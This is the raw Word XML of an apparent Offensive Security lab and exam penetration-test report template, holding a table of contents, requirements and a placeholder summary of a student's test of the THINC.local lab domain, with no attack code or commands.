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60AC8E55" w:rsidR="004C32FD" w:rsidRDefault="00620F73">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r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>Internal Lab an</w:t>
      </w:r>
      <w:r w:rsidR="00363D5A">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t>d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:color w:val="000000"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
          <w:u w:color="17375E"/>
        </w:rPr>
        <w:t xml:space="preserve"> Exam</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2B7AF8" w14:textId="460D29D2"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050C58">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2</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D459336"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7"/>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57B61CEA"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0B0B14">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> Offensive Security Ltd. All rights reserved.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E9A991" w14:textId="1236CAC0" w:rsidR="00F23122"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p w14:paraId="79AE0904" w14:textId="77777777" w:rsidR="00F23122" w:rsidRDefault="00620F73" w:rsidP="00BB687E">
      <w:pPr>
        <w:pStyle w:val="TOCHeading"/>
        <w:spacing w:line="288" w:lineRule="auto"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:color="000000"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Table of Contents</w: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begin"/>
      </w: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instrText xml:space="preserve"> TOC \o 1-2 </w:instrTex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separate"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="249CDEBB" w14:textId="602CEF87"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rPr>
        <w:t>1.0 Offensive Security Lab and Exam Penetration Test Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959346 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="31198493" w14:textId="02253AC5"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1.1 Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959347 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AFFD0AC" w14:textId="169AD2A6"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1.2 Objective</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959348 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F52517" w14:textId="099F39CD"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1.3 Requirements</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959349 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="119C853A" w14:textId="4D522414"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2.0 Sample Report </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4D10">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>– High-Level Summary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959350 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAFB972" w14:textId="79C45810"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2.1 Sample Report - Recommendations</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959351 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6A1DCF" w14:textId="3CA39740"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3.0 Sample Report </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4D10">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>– Methodologies</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959352 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E066E68" w14:textId="72ECEFC8"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3.1 Sample Report </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4D10">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:noProof/>
        </w:rPr>
        <w:t>– Information Gathering</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959353 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C66E4F" w14:textId="5CD06C82"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3.2 Sample Report – Service Enumeration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959354 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282C76F" w14:textId="5499B811"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3.3 Sample Report – Penetration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959355 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E29B508" w14:textId="1E99AC31"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3.4 Sample Report – Maintaining Access</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959356 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1112C73B" w14:textId="3ABE746F"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3.5 Sample Report </w:t>
      </w:r>
      <w:r w:rsidRPr="000B4D10">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:noProof/>
        </w:rPr>
        <w:t>– House Cleaning</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959357 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1871D550" w14:textId="35338FDD"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rPr>
        <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:instrText xml:space="preserve"> PAGEREF _Toc59959358 \h </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="04AD7170" w14:textId="26431478" w:rsidR="004C32FD" w:rsidRDefault="00620F73" w:rsidP="00D6306A">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pP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bookmarkStart w:id="0" w:name="_Toc59959346"/>
      <w:r w:rsidRPr="00D6306A">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lastRenderedPageBreak/>
        <w:t>1.0 Offensive Security Lab and Exam Penetration Test Report</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="0CE59348"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1" w:name="_Toc59959347"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.1 Introduction</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="5E4FF078" w14:textId="7ED9871C"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Offensive Security Lab and Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security course. This report should contain</w:t>
      </w:r>
      <w:r w:rsidR="00B45108">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>all items that were used to pass the overall exam</w:t>
      </w:r>
      <w:r w:rsidR="00B45108">
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve"> and it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t xml:space="preserve">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14:paraId="3BC91817"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2" w:name="_Toc59959348"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1.2 Objective</w:t>
      </w:r>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p w14:paraId="2CAE04CC"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objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and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2AFAC2CE"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3" w:name="_Toc59959349"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1.3 Requirements</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
    </w:p>
    <w:p w14:paraId="71101141"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student will be required to fill out this penetration testing report fully and to include the following sections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1072E234" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Overall High-Level Summary and Recommendations (non-technical)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225C9479" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Methodology walkthrough and detailed outline of steps taken</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B8A68B" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ADA125D" w14:textId="67193DEB" w:rsidR="00D6306A" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Any additional items that were not included</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E6953EA" w14:textId="77777777" w:rsidR="00D6306A" w:rsidRDefault="00D6306A">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Arial Unicode MS" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFF5AE5" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="4" w:name="_Toc59959350"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2.0 Sample Report </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:t>– High-Level Summary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="4"/>
    </w:p>
    <w:p w14:paraId="214EC641"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John Doe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r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
        </w:rPr>
        <w:t>THINC.local</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> domain. John</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>’s overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="661874E4"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When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network. When performing the attacks, John was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.  During the testing, John had administrative level access to multiple systems. All systems were successfully exploited and access granted. These systems as well as a brief description on how access was obtained are listed below:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53494165"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Lab Trophy 1 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5E8F1E"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Lab Trophy 2 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A53A0F"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Lab Trophy 3 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B101DA"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Exam Trophy 1 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA0EF13" w14:textId="05BCB185" w:rsidR="00BB687E" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular" w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NoneA"/>
          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
        </w:rPr>
        <w:t>Exam Trophy 2 – Got in through X</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60616470" w14:textId="77777777" w:rsidR="00BB687E" w:rsidRDefault="00BB687E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Cambria" w:hAnsi="Roboto Bold" w:cs="Cambria"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:color="000000"/>
          <w:lang w:eastAsia="en-ZA"/>
          <w14:textOutline w14:w="12700" w14:cap="flat" w14:cmpd="sng" w14:algn="ctr">
            <w14:noFill/>
            <w14:prstDash w14:val="solid"/>
            <w14:miter w14:lim="400000"/>
          </w14:textOutline>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="15006E71" w14:textId="6EF24C2E" w:rsidR="004C32FD" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="5" w:name="_Toc59959351"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
          <w:u w:color="000000"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.1 Sample Report - Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="5"/>
    </w:p>
    <w:p w14:paraId="4C99A3EA"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3D32310F" w14:textId="77777777" w:rsidR="004C32FD" w:rsidRPr="00BB687E" w:rsidRDefault="00620F73">
      <w:pPr>
        <w:pStyle w:val="Heading"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="000000"/>
